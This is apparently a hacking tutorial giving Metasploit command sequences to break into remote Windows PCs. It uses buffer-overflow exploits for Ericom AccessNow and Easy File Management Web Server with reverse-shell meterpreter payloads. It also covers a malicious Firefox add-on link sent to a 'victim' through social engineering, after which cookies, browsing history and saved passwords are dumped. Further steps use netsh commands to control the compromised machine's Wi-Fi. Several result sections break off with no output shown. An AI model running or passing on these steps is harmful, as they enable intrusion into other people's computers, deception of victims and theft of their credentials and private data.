Hack WIFI Setting of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Detect list of available Wireless Networks

netsh wlan show networks mode=bssid



How to show available Wireless Network profiles your PC

netsh wlan show profile


How to show the installed Wireless drivers

netsh wlan show drivers


How to disconnect to a Wireless Network

netsh wlan disconnect


Other Commands

Connects to a Wireless Network
netsh wlan connect name=profile name
Saves wlan profiles
netsh wlan export profile name= profile name
show the blocked network
netsh wlan show blockednetworks

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets
Ericom AccessNow Server 2.4.0.2

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole


Now type use exploit/windows/http/ericom_access_now_bof
msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)
msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)
msf exploit (ericom_access_now_bof)>exploit


Hack Remote Windows PC using Easy File Management Web Server Stack Buffer Overflow

Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets
Easy File Management Web Server v5.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit


Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole


Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

How to Gather History

Now type use post/firefox/gather/history
msf exploit (history) set payload firefox/shell_reverse_tcp
msf exploit (history)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (history)>set session 1
msf exploit (history)>exploit   


Result will stored on your local computer
/root/.msf4/loot/
A look at the result, you will see data like


How to Gather Cookies

Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/cookies
msf exploit (cookies) set payload firefox/shell_reverse_tcp
msf exploit (cookies)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


Result will stored on your local computer
/root/.msf4/loot/

Hack Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole



Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC


Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/passwords
msf exploit (passwords) set payload firefox/shell_reverse_tcp
msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local Host)
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit  

Result will stored on your local computer
/root/.msf4/loot/

A look at the result, you will see data like